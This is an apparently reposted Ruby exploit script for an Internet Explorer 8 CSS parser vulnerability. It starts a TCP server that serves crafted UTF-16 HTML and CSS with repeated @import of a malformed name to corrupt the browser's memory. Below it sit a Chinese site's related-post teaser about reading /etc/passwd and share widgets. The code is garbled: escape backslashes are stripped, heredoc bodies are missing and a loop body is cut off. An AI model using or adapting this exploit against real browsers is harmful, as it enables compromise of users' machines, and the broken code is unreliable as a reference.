#!/usr/bin/env ruby
# Source: http://www。breakingpointsystems。com/community/blog/ie-vulnerability/
# Author: Nephi Johnson (d0c_s4vage)
require 'socket'
def http_send(sock, data, opts={})
defaults = {:code=>"200", :message=>"OK", :type=>"text/html"}
opts = defaults.merge(opts)
code = opts[:code]
message = opts[:message]
type = opts[:type]
to_send = "HTTP/1.1 #{code} #{message}rn" +
"Date: Sat, 11 Dec 2010 14:20:23 GMTrn" +
"Cache-Control: no-cachern" +
"Content-Type: #{type}rn" +
"Pragma: no-cachern" +
"Content-Length: #{data.length}rnrn" +
"#{data}"
puts "[+] Sending:"
to_send.split("n").each do |line|
puts " #{line}"
end
sock.write(to_send) rescue return false
return true
end
def sock_read(sock, out_str, timeout=5)
begin
if Kernel.select([sock],[],[],timeout)
out_str.replace(sock.recv(1024))
puts "[+] Received:"
out_str.split("n").each do |line|
puts " #{line}"
end
else
sock.close
return false
end
rescue Exception => ex
return false
end
end
def to_uni(str)
res = ""
str.each_byte do |b|
res
end
res
end
@css_name = "x00sx03sx00sx03sx00sx03sx00sx03s"
@html_name = "test.html"
placeholder = "a" * (@css_name.length/2)
@html =
HTML
@html = "xfexff" + to_uni(@html)
@html.gsub!(to_uni(placeholder), @css_name)
@css =
@import url("#{placeholder}");
@import url("#{placeholder}");
@import url("#{placeholder}");
@import url("#{placeholder}");
CSS
@css = "xfexff" + to_uni(@css)
@css.gsub!(to_uni(placeholder), @css_name)
@index =
#{@html_name}
INDEX
TCPServer.open(55555) do |srv|
while true
cli = srv.accept
req = ""
html = ""
css = ""
index = ""
next unless sock_read(cli, req, 5)
while req.length > 0
if req =~ /GET/
if req =~ /GET.*#{Regexp.escape(@html_name)}/
break unless http_send(cli, @html, :type=>"text/html")
elsif req =~ /GET.*index/
break unless http_send(cli, @index)
elsif req =~ /GET.*#{Regexp.escape(@css_name)}/
break unless http_send(cli, @css, :type=>"text/css")
else
break unless http_send(cli, @css, :type=>"text/css")
end
elsif req =~ /QUIT/
exit()
end
req = ""
next unless sock_read(cli, req, 5)
end
cli.close rescue next
end
end
文章来源于lcx.cc:Exp Internet Explorer 8 CSS Parser Exploit
相关推荐: 科普:etc/passwd怎么利用?为什么很多漏洞都扫描、读取etc/passwd文件呢?
求科普etc/passwd怎么利用 好基友一辈子 | 2014-05-06 16:33 看别人任意文件读取都是读passwd这个文件。 这个文件有什么用处? 拿不到实际的权限吧 [原文地址] 各种吐槽: 1# BadCat (目前正在学习中.....) | 2…
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论